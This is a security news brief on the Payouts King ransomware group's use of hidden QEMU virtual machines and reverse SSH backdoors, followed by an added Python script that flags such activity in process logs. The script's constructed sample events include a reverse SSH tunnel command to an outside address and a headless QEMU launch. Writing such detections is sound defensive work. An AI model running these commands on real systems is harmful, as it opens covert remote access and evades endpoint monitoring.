Payouts King ransomware abuses QEMU for hidden VMs and backdoors

April 20, 2026
By SC Staff

The Payouts King ransomware operation is leveraging the QEMU emulator to create hidden virtual machines and establish reverse SSH backdoors on compromised systems, allowing its operators to bypass endpoint security measures. This technique enables attackers to run malicious payloads and store sensitive data undetected within the host environment, with further coverage provided by Bleeping Computer.

Researchers have identified two distinct campaigns utilizing QEMU. The first, linked to the GOLD ENCOUNTER threat group and Payouts King ransomware, uses QEMU to run a hidden Alpine Linux VM as SYSTEM. This VM contains tools for credential harvesting and data exfiltration. Initial access in this campaign was achieved through exposed SonicWall VPNs and SolarWinds Web Help Desk vulnerabilities.

The second campaign exploits the CitrixBleed 2 vulnerability to gain access, subsequently deploying a QEMU VM with manually installed tools for reconnaissance and data staging. Both campaigns demonstrate a sophisticated use of virtualization to evade detection and facilitate malicious activities.

Organizations should implement robust monitoring for unauthorized QEMU instances, suspicious scheduled tasks, and unusual SSH activity.

Source: Bleeping Computer
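The monitoring recommendation above can be turned into a first-pass detection over process-creation telemetry. The following is an added example written for this page, not code from the article or from the researchers it cites: it flags QEMU started as SYSTEM or without a visible console, and OpenSSH started with a remote (reverse) port forward. The event field names (image, user, parent, cmdline) and every sample event are constructed for the example; map them to the schema of your own EDR or Sysmon data.

```python
"""Added example: detection pass over process-creation events for the
behaviours the article says to monitor (QEMU as SYSTEM or headless, SSH
with a reverse port forward). Field names and sample events are constructed."""
import re

# Constructed process-creation events. The schema (image, user, parent,
# cmdline) is an assumption for this example, not any product's format.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",
     "user": r"NT AUTHORITY\SYSTEM",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "qemu-system-x86_64.exe -m 1024 -display none -hda alpine.qcow2"},
    {"image": r"C:\Users\dev\qemu\qemu-system-x86_64.exe",   # legitimate developer use
     "user": r"CORP\dev",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "qemu-system-x86_64.exe -m 4096 -hda test.qcow2"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "user": r"NT AUTHORITY\SYSTEM",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:22 user@198.51.100.7"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",        # ordinary interactive SSH
     "user": r"CORP\dev",
     "parent": r"C:\Windows\System32\WindowsTerminal.exe",
     "cmdline": "ssh.exe admin@jumphost.corp.example"},
]

QEMU_IMAGE = re.compile(r"^qemu-system-\w+(\.exe)?$", re.IGNORECASE)
SSH_IMAGE = re.compile(r"^ssh(\.exe)?$", re.IGNORECASE)
# Accounts under which a hypervisor or SSH client is rarely expected on endpoints.
SYSTEM_ACCOUNTS = {"nt authority\\system", "root"}


def basename(path: str) -> str:
    """Last path component, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


def is_headless_qemu(tokens: list[str]) -> bool:
    """QEMU launched with no visible console: -nographic, or '-display none'."""
    if "-nographic" in tokens:
        return True
    return any(a == "-display" and b == "none" for a, b in zip(tokens, tokens[1:]))


def has_reverse_forward(tokens: list[str]) -> bool:
    """OpenSSH remote forward, written either as '-R spec' or fused '-Rspec'."""
    return any(t == "-R" or re.match(r"^-R\d", t) for t in tokens)


def classify(event: dict) -> list[str]:
    """Return the list of finding labels for one process-creation event."""
    findings: list[str] = []
    image = basename(event["image"])
    user = event["user"].lower()
    tokens = event["cmdline"].split()
    if QEMU_IMAGE.match(image):
        if user in SYSTEM_ACCOUNTS:
            findings.append("qemu-as-system")
        if is_headless_qemu(tokens):
            findings.append("qemu-headless")
    elif SSH_IMAGE.match(image):
        if has_reverse_forward(tokens):
            findings.append("ssh-reverse-tunnel")
        if user in SYSTEM_ACCOUNTS:
            findings.append("ssh-as-system")
    return findings


def scan(events: list[dict]) -> list[list[str]]:
    """Classify every event; an empty list means nothing noteworthy."""
    return [classify(e) for e in events]


if __name__ == "__main__":
    for event, findings in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        if findings:
            print(f"{event['user']:>22}  {basename(event['image']):<28} {', '.join(findings)}")
```

The two benign events (a developer's QEMU session and an interactive SSH login) produce no findings, which is the point of keying on account context and flags rather than on the binary name alone; the parent process field is carried through so the same pass can be extended to the scheduled-task hosts the article mentions once you know how your telemetry names them.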